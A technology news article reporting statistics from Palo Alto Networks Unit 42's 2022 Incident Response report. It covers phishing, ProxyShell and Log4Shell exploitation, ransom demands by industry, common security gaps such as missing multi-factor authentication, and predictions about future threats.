Phishing attempts, the exploitation of known vulnerabilities, and brute-force credential attacks are the three primary attack vectors for cybercriminals looking to infiltrate networks, a report from Palo Alto Networks’s Unit 42 has revealed.
The most probable entry point for threat actors into a target organization’s network and systems is phishing, followed by exploitation of known software vulnerabilities, which together were responsible for 68% of the suspected intrusions.
Additionally, the exploitation of credentials, whether compromised or unknown, is a real headache for organizations. Brute-force credential attacks against remote desktop protocol (RDP) accounted for 9% of total attacks. The use of compromised credentials also led to 6% of all attacks, according to the 2022 Incident Response report by Palo Alto Networks Unit 42.
Commonly Used Attack Vectors | Source: Palo Alto Networks Unit 42Opens a new window
Phishing has consistently remained one of the top attack vectors for hackers to gain initial access to target networks. It involves social engineering to create urgency for employees to complete a task. However, the exploitation of vulnerabilities is much more technical with varying degrees of difficulty.
For instance, Log4Shell vulnerabilities (CVE-2021-44228, CVE-2021-45046, and CVE-2021-44832) in the Log4j logging tool are feared to last nearly a decade. Yet, Log4j flaws accounted for 14% of total exploitation incidents. “Log4Shell was rated 10 on the Common Vulnerability Scoring System (CVSS)—the highest possible score,†Unit 42 said.
See More: 5 Best Practices for Incident Response in Cloud Environments
“And while Apache Log4j 2 may not have been a household name outside the technical community, the software underlies a large number of well-known services and systems. Organizations all over the globe had vulnerable systems (whether or not they knew it), and mass scanning activities seeking these vulnerable systems began almost immediately.â€
With a 55% share of exploits, ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) were the most exploited.
Exploited Vulnerabilities in Unit 42 Cases | Source: Unit 42
Once the organizational perimeter is breached, threat actors are most likely to carry out ransomware attacks (36%), business email compromises (34%) and network intrusion (14%). Besides these three, other incidents that Palo Alto Networks responded to were insider threats (5%), extortion without encryption (4%), exposure investigation (1%), PCI investigation (1%), and web app compromise (1%).
Industries that the bad guys targeted the most were those that store, process, and transmit high volumes of monetizable sensitive information. The most widely targeted industries in descending order were finance, professional and legal services, manufacturing, healthcare, high tech, wholesale and retail, education, and hospitality.
The attackers’ choice of the industry as a target can also vary depending on the victim’s need to avoid operational disruptions, the use of software with known vulnerabilities, or simply because the threat actors found a weakness while scouring the internet.
Scanning the internet for vulnerabilities is a ransomware favorite, according to Palo Alto Network’s Unit 42. The company noted in its 2022 Attack Surface Management Threat report that attackers start scanning for vulnerabilities within 15 minutes of a CVE being announced. Threat actors also leveraged software vulnerabilities the highest (48%) when conducting ransomware attacks.
Threat actors demanded $7.96 million from finances, the highest among all industries, followed by $5.2 million from real estate.Â
See More: ML is a Game Changer for the Incident Management Lifecycle
Average Ransom Demand by Industry | Source: Unit 42
Between March 2021 and April 2022, the highest ransom payout by a victim was $8 million, while the highest ransom demand was $30 million. Compared to the average ransomware demand ($7.86 million), the average amount stolen in a BEC attack was $286,000. So patching vulnerabilities should be a top priority for organizations.
After a successful cyberattack, the most common mistakes that came to light were:
- Lack of multi-factor authentication – 50% didn’t have it
- Lack of endpoint detection and response (EDR) or extended detection and response (XDR) – 44% didn’t have it
- Poor patch management – 28%
- No mitigations for brute-force attacks – 13%
- Ignoring security alerts – 11%
- Weak password security practices – 7%
- System misconfiguration – 7%
“Consider this list a reverse-engineered set of recommendations based on our case observations from the past year. If you ensure your organization addresses the issues below before an incident occurs, you can discourage threat actors who are after low-hanging fruit,†Unit 42 noted. “If threat actors do try to attack your systems, they’ll have a harder task ahead.â€
What lies ahead
Incident responders made the following six predictions:
- Attackers are actively looking for vulnerabilities, so organizations will have less time to fix them.
- It is going to take a lot less to carry out cyberattacks. In other words, the threat from unskilled threat actors is increasing.
- Cryptocurrency dynamics and uncertainties could make threat actors resort to traditional fiat currency-based cyber crimes such as BEC, credit card fraud, etc.
- As is with traditional crime, bearish economic conditions could push more people into cybercrime.
- Geopolitical turmoil could shape cyberattacks, which could become politically motivated. We already saw this when the Russia-Ukraine conflict broke out.
Note: The 2022 Incident Response report by Palo Alto Networks Unit 42 is based on 600 incident response cases completed between March 2021 and April 2022, of organizations with fewer than 50 personnel to Fortune 500 companies and government organizations with greater than 50,000 employees.
Let us know if you enjoyed reading this news on LinkedInOpens a new window , TwitterOpens a new window , or FacebookOpens a new window . We would love to hear from you!